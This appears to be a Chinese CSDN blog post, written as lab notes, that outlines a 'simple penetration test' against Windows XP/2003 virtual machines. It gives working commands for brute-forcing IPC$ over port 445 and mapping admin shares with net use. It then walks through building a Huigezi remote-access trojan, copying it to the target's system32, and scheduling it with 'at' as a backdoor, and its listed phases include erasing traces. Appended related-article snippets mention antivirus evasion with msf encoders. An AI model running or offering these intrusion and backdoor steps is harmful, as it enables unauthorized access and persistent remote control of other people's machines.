009 简单的渗透测试流程

最新推荐文章于 2022-04-07 01:04:45 发布
最新推荐文章于 2022-04-07 01:04:45 发布
阅读量322 收藏 2
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34555653/article/details/116025382
版权
本文详述了网络安全中的端口扫描与渗透测试步骤,包括信息收集、漏洞扫描、利用、提权、植入木马及留后门等环节。通过手工测试端口号和使用工具如nmap、telnet、NTscan等,展示了如何进行445端口的漏洞利用和远程控制。同时,文中提及了入侵过程中的安全注意事项和后门设置,以及渗透测试报告的编写要点。
摘要由CSDN通过智能技术生成

目录:

一:流程

1 信息收集
	nslookup whois
2 扫描漏洞
	namp软件,扫描IP范围,端口
	scanport软件
	高级扫描:如IIS漏洞,扫描网站漏洞
3 漏洞利用
4 提权(shell环境、桌面环境、最高权限)
5 为所欲为。。。。。。。。
6 毁尸灭迹
7 留后门(植入木马)
8 渗透测试报告(风险等级,漏洞类型,安全加固方案等)

二:手工测试端口号

telnet IP 端口号
	net use f: \\10.1.1.2\share 密码 /user:用户名    把对方的共享文件夹映射为自己的f盘
	net use 			查看有多少网络共享链接
	net use f: /del
	net use * /del
	net use f: \\10.1.1.2\c$ 密码 /user:用户名
	net use \\10.1.1.2\ipc$ 密码 /user:用户名		创建一个空链接,可以访问所有内容

	1:scanport扫描445端口
	2:445漏洞利用之一IPC$:进行暴力破解:用到工具NTscan
	3:net use \\10.1.1.2\ipc$ 密码 /user:用户名
	4:制作木马 ,利用灰鸽子软件
	5:植入木马(留后门)
		copy d:\heihei.exe \\10.1.1.1\C$\windows\system32
	6:设置计划任务,自动执行木马:
		net time \\10.1.1.2
		at \\10.1.1.2 11:11 "c:\windows\system32\heihei.exe"
	7:等待肉鸡上线

 

三: 入侵(手动滑稽) 渗透步骤

虚拟机快照还原至初始状态
准备好xp和win2003,连接至同一网络,分别配置IP10.1.1.2/24,10.1.1.1/24
准备好软件
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
打开scanport软件扫描窗口
在这里插入图片描述
发现,局域网内有一台电脑开放了445端口号,它的IP地址是10.1.1.1
在这里插入图片描述
以记事本形式打开密码字典和账号字典,因为是做实验,所以加入一个正确的密码,放在其中
在这里插入图片描述
开始爆破
在这里插入图片描述
这时候我们就知道了,对方的账号administrator和密码123.com
在这里插入图片描述
现在就可以查看对方电脑的盘符文件了,比如查看C盘
在这里插入图片描述
再比如:我要控制对方关机
在这里插入图片描述

在这里插入图片描述
接下来运行刚才的关机脚本
如果直接这么做的话,那就是坑自己了,好像是运行\10.1.1.1\c$里面的脚本。实际上是在本机上运行
在这里插入图片描述
方法一:
可以telnet连接,前提是对方开启了23端口号
在这里插入图片描述

在这里插入图片描述
开启23之后,输入刚才爆破的账号密码,
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
方法二:
那对方没有开启23端口号呢,用到另外一条命令

at \\ip 时间 "运行程序的路径",注意这个路径不用c$,而是c:

在这里插入图片描述
在这里插入图片描述
接下来是留后门,植入木马,方便下次进入,打开软件“鸽子牧民战天”
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
这就是刚才生成的木马,我把保存路径修改成e盘根目录

在这里插入图片描述
接下来把xp本机生成的木马放到
在这里插入图片描述
在这里插入图片描述
三分钟之后,查看是否成功
在这里插入图片描述
渗透成功
在这里插入图片描述
若是渗透不成功,有可能是如下图的安装路径有问题,可以用默认的或者再换个路径试试
在这里插入图片描述

入狱计划进度50%
关注
专栏目录
渗透测试流程与内网渗透测试实战
悦分享
07-15 7267
关于免杀,我使用的全部是msf的编码自免杀,64位使用的是x64/zutto_dekiru,32位使用的是x86/shikata_ga_nai,360都没有拦截。虽然靶机中有360,但是我直接上传的mimikatz也没有被杀,所以我有些怀疑是360的版本比较低,除了web服务器上传的第一个payload,其它都进行了编码处理,而第一个也确实没有执行成功,这说明360至少对第一个payload是拦截了的。
c语言渗透测试,C/S架构渗透测试流程
weixin_36087674的博客
05-18 1017
前言为什么要写了,主要是因为每个月都会突然有一个项目,是有C/S架构的系统要渗透测试,所以其实记笔记,下次打开来看着流程测就完事了。正文1.检查是否加壳C/S架构渗透,我个人理解中说到底就是逆向,所以第一步,首先就是查壳。这个挺简单,C/C++,delphi,VBasic这类语言的,可以使用exeinfope,PEID等软件就可以了,通常没加壳的软件都会如下图一样,直接显示是用什么语言编写的。如果...
[网络安全课程实验]关于简单渗透测试流程实验
zero_531的博客
07-07 349
第一次写博客,先试试吧。。。 从昨天开始到现在,复现了一遍教程上的简单渗透测试流程。因为视频中是利用Windows2003搭建的靶机并且跟着做了一遍,所以我就利用VMware15搭建了一个系统是win7简单的靶机并在防火墙的入站规则中写入新的入站规则,打开21-25,80,443,445端口。 做好靶机之后,假定我并不知道靶机的任何信息。先执行以下操作: 1.利用nmap对靶机扫描(scanport也可以进行扫描),得出一些常用端口的相关信息,不过得到信息有点出乎意料,因为我打开的几个端口,扫描之后只有44
软件测试理论、方法、流程及规范(其一)
xw_009的博客
04-08 1812
一、软件测试理论基础 软件测试的定义: 使用人工和自动手段来运行程序,目的在于检验是否满足了需求。 软件测试的目的: 是想以最少的人力、物力和时间找出软件中潜在的各种错误与缺陷,通过修正各种错误和缺陷提高软件质量,回避软件发布后由于潜在的软件缺陷和错误造成的隐患以及带来的商业风险。(以最少的人力、物力和时间找到软件中的缺陷并修改,从而避免商业风险。) 软件测试的原则: 追溯到用户需求;...
net命令
小王的博客
05-19 455
1)建立空连接: net use \\IP\ipc$ "" /user:""        (一定要注意:这一行命令中包含了3个空格)  2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码"     (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名"       (即可将对方的
渗透测试流程 - 渗透测试的9个步骤
刘思成的博客
05-25 5448
渗透测试的流程: 1.明确目标 2.分析风险,获得授权 3.信息收集 4.漏洞探测(手动&自动) 5.漏洞验证 6.信息分析 7.利用漏洞,获取数据 8.信息整理 9.形成报告 1.明确目标 1)确定范围:测试的范围,如:IP、域名、内外网、整站or部分模块; 2)确定规则:能渗透到什么程度(发现漏洞为止or继续利用漏洞)、时间限制、能否修改上传、能否提权… 目标系统介绍、重点保护对象及特性。 是否允许数据破坏? 是否允许阻断业务正常运行? 测试之前是否应当知会相关部门接口人? 接入方式?外网和
渗透测试流程——渗透测试的9个步骤(转)
热门推荐
橘子女侠
05-09 2万+
渗透测试的流程: 1.明确目标 2.分析风险,获得授权 3.信息收集 4.漏洞探测(手动&自动) 5.漏洞验证 6.信息分析 7.利用漏洞,获取数据 8.信息整理 9.形成报告 1.明确目标 1)确定范围:测试的范围,如:IP、域名、内外网、整站or部分模块; 2)确定规则:能渗透到什么程度(发现漏洞为止or继续利用漏洞)、时间限制、能否修改上传、能否提权... 目标系统介绍、重...
渗透测试流程
xcxhzjl的博客
11-18 2254
一、前期交互阶段 渗透测试人员与客户组织进行讨论,确定渗透测试的范围和目标。此阶段需要收集客户组织的需求、渗透测试的计划、范围、限制条件、服务合同等细节。 二、情报搜集阶段 1、踩点 攻击者通过公开的渠道获取目标组织的各种信息,该过程称为收集公开资源情报(OSINT,Open Source Intelligence),可收集的信息包括: (1)因特网域名、网络地址块及子网信息、联网的各个系统(如:组织机构的Web站点、DNS服务器)的IP地址及关键系统的软硬件信息。 (2)远程访问的类型、身份认
渗透测试.pdf
07-15
渗透测试的基本流程大致分为几个步骤:首先是准备工作,包括明确测试目标、范围和规则;其次是信息收集,获取被测系统的各种信息;第三是进行漏洞分析和风险评估,识别可能的弱点;然后是实际攻击,测试并尝试利用...
靶机渗透测试实战(一)——熟悉渗透测试流程简单测试
橘子女侠
05-09 1万+
本篇文章不注重于渗透测试,而在于将之前学习过的方法加以熟悉; 1. 实验环境 靶机:CentOS 6.7,IP地址为:192.168.37.137 攻击机:Kali,IP地址为:192.168.37.131 运行环境:VMware 2. 实验步骤 信息收集 (1)查询攻击机Kali的IP地址; (2)识别存活的主机,发现攻击的目标 (注:二、三、四层发现的目的都是识别...
web渗透测试流程
Froglets的博客
11-29 728
@ [web渗透测试流程] 一、什么是渗透测试? 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。换句话来说,渗透测试是指渗...
渗透测试要怎么做?
qq_43305605的博客
12-29 2146
渗透测试的一般做法 很多企业应用,特别是web应用,利用商业的漏洞扫描工具做安全/渗透测试比较多。利用这种商业性漏洞扫描工具进行自动化扫描的比较多。但是由于一些不太确定的原因,自动化扫描出来的结果有很多是误报,结果是不太准确的。 反而在企业中,进行手动做渗透测试的不多。如果不手动去排查漏洞,其实可能会漏掉一些比较严重的漏洞。那么为什么手动渗透测试比较重要呢? 只有自己是最了解自己的,企业内部专人去手动排查安全漏洞,会比较有侧重点,这样就可以达到事半功倍的效果。 自动化扫描,只是基于一些既定规则的扫描,扫描
009-回归测试的测试范围是什么?
weixin_34319640的博客
06-04 834
回归测试的测试范围是什么? 测试用例的维护是一个不间断的过程,通常可以将软件开发的基线作为基准,维护的主要内容包括下述几个方面。(1)、删除过时的测试用例  因为需求的改变等原因可能会使一个基线测试用例不再适合被测试系统,这些测试用例就会过时。例如,某个变量的界限发生了改变,原来针对边界值的测试就无法完成对新边界测试。所以,在软件的每次修改后都应进行相应的过时测试用例的删...
渗透测试的八个步骤
178技术
10-12 9302
什么是渗透测试? 其实很多安全漏洞都属于Web应用漏洞,这些Web漏洞可以通过渗透测试验证。渗透测试是利用模拟黑客攻击的方式,评估计算机网络系统安全性能的一种方法。这个过程是站在攻击者角度对系统的任何弱点、技术缺陷或漏洞进行主动分析,并且有条件地主动利用安全漏洞。 渗透测试并没有严格的分类方法,即使在软件开发生命周期中,也包含了渗透测试的环节,但是根据实际应用,普遍认为渗透测试分为黑盒测试、白盒测试2类,其中黑盒测试中,渗透者完全处于对系统一无所知的状态,而白盒测试与黑盒测试恰恰相反,渗透者在完全了解程序
054 webshell介绍与文件上传漏洞
鸡蛋炒鸡蛋
03-24 7153
文章目录
050 XSS通关小游戏——xss challenge
鸡蛋炒鸡蛋
03-05 5950
文章目录一:下载与部署二:通关过程首页level-01level-02level-03level-04level-05level-06level-07level-08level-09 一:下载与部署 xss challenge是个有关反射型xss的测试通关挑战,一共有20关。 下载地址:xss challenge (访问密码:donMkh) 下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可   二:通关过程 这个是我自己的通关方法,不一定很准确 首页 level-01 点击
040 OpenVAS的下载与安装
鸡蛋炒鸡蛋
02-17 5727
文章目录一:OpenVAS的下载二:OpenVAS的安装2.1:中文版本步骤2.2:英文版本步骤 一:OpenVAS的下载 OpenVAS是开源的网络漏洞扫描器,自从Nessus收费了之后,分支出来的免费的 官网:https://www.openvas.org/ web端管理接口,4.9之后支持中文 这是我自己另外安装的版本,视频中版本的没找到。。。。 下载地址:https://www.greenbone.net/en/testnow/#toggle-id-3 新建虚拟机 推荐配置: VirtualBox
059 提权与反弹shell
鸡蛋炒鸡蛋
04-07 5377
文章目录一:权限提升概述二:windows提权2.1: 启动项提权2.2:系统漏洞提权2.2.1:笔记2.2.2:实验 一:权限提升概述 水平权限提升(越权) 同级账户间切换身份,比如有ABC三个用户,AB是普通用户只能自己发帖,然后只能删除自己的贴,C是管理员能删除所有人的帖子,然后突然A可以删除B的帖子了,这就是越权。 垂直权限提升 普通用户获得了管理员的权限 web用户直接提权成管理员用户     二:windows提权 前提: 基于webshell提权,也就是说目标机器存在大马文
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值